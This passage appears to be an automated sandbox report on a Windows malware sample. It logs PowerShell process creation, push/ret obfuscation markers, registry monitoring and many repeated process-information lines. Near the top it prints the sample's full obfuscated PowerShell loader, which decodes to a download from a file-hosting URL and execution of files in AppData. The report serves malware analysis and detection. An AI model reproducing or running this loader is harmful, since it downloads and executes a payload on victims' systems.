Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed	Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF8490171C8 push esp; retf	2_2_00007FF8490171C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_077508C2 push eax; mov dword ptr [esp], ecx	5_2_07750AC4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09123112 push eax; retf	5_2_09123122
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911F522 push ecx; retf	5_2_0911F5EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09120126 push cs; retf	5_2_0912017A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911DD5B push ecx; retf	5_2_0911DD86
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911DD45 push eax; ret	5_2_0911DD46
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0912199C push ebp; retf	5_2_09121A0E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091221A3 push ds; iretd	5_2_091221A4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911E5A3 push ebx; retf	5_2_0911E5BA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911D9AC push ebx; retf	5_2_0911DABA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911D9AC push FFFFFFD6h; retf	5_2_0911DAC6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091231C3 push ds; retf	5_2_091231C9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091239C4 push 00000069h; retf	5_2_091239C6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091205EC push ecx; retf	5_2_091205F2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911D004 push ebp; ret	5_2_0911D00C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911CC3E push ebx; ret	5_2_0911CC4E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911D84A push 00000001h; iretd	5_2_0911D852
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09124476 push ebx; ret	5_2_0912448A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09123C82 push ebx; ret	5_2_09123C8A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09122084 push eax; ret	5_2_091220EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911FC8A push ds; retf	5_2_0911FCAA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091220B2 push eax; ret	5_2_091220EE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091234BA push ebp; iretd	5_2_091234C2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_091240DF push A6FE4245h; ret	5_2_091240E9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0911ECF6 push edx; retf	5_2_0911ECFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09120F03 push ebx; retf	5_2_09120F0A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09124B03 push edx; ret	5_2_09124B06
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09122F06 push ecx; retf	5_2_09122F7E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09122F5C push ecx; retf	5_2_09122F7E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_09122349 push edi; retf	5_2_0912234A

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
